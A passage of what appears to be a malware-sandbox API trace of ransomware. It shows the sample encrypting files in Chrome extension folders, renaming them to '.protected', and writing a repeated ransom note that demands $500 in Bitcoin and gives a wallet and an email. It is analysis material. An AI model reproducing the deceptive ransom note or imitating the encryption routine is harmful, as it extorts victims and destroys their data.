minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.039] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.039] lstrlenA (lpString="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") returned 684 [0079.039] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.040] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.040] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.040] CloseHandle (hObject=0x164) returned 1 [0079.040] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.040] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0079.040] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0079.040] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0079.040] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0079.040] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0079.040] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl") returned 141 [0079.040] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0079.040] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0079.040] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\*") returned 143 [0079.040] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.040] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.040] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.040] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.040] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.040] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.040] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\.") returned 143 [0079.041] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.041] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.041] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.041] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.041] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.041] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.041] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.041] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\..") returned 144 [0079.041] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.041] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.041] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.041] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.041] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.041] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.041] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.041] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.041] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json") 
returned 155 [0079.041] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.041] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.041] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.041] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.041] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json") returned 155 [0079.041] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json") returned 155 [0079.042] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json") returned 155 [0079.042] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.042] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0079.042] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.043] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0079.043] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.043] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.043] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.043] CloseHandle (hObject=0x168) returned 1 [0079.043] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.protected") returned 165 [0079.043] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.protected")) returned 1 [0079.043] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.044] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.044] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\RESTORE_FILES.txt") returned 159 [0079.044] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.044] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.044] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.044] lstrlenA (lpString="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") returned 684 [0079.044] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.045] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.045] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.045] CloseHandle (hObject=0x164) returned 1 [0079.045] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.045] lstrcmpiW (lpString1="no", lpString2="Windows") returned -1 [0079.045] lstrcmpiW (lpString1="no", lpString2="Program Files") returned -1 [0079.045] lstrcmpiW (lpString1="no", lpString2="Program Files (x86)") returned -1 [0079.045] lstrcmpiW (lpString1="no", lpString2="$Recycle.bin") returned 1 [0079.045] lstrcmpiW (lpString1="no", lpString2="System Volume Information") returned -1 [0079.045] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no") returned 141 [0079.045] lstrcmpW (lpString1="no", lpString2=".") returned 1 [0079.045] lstrcmpW (lpString1="no", lpString2="..") returned 1 [0079.045] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\*") returned 143 [0079.045] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.045] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.045] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.045] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.045] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.045] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.045] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\.") returned 143 [0079.045] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.045] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.046] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.046] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.046] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.046] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.046] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.046] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\..") returned 144 [0079.046] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.046] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.046] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.046] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.046] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.046] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.046] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.046] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.046] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json") 
returned 155 [0079.046] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.046] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.046] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.046] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.047] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json") returned 155 [0079.047] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.047] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json") returned 155 [0079.047] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.047] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json") returned 155 [0079.047] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.047] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc3, lpOverlapped=0x0) returned 1 [0079.048] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.048] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc3, lpOverlapped=0x0) returned 1 [0079.048] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.048] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.048] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.048] CloseHandle (hObject=0x168) returned 1 [0079.048] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.protected") returned 165 [0079.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.protected")) returned 1 [0079.049] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.049] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.049] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\RESTORE_FILES.txt") returned 159 [0079.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.049] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.049] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.050] lstrlenA (lpString="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") returned 684 [0079.050] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.050] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.050] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.050] CloseHandle (hObject=0x164) returned 1 [0079.050] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.050] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0079.050] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0079.051] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0079.051] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0079.051] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0079.051] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl") returned 141 [0079.051] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0079.051] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0079.051] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 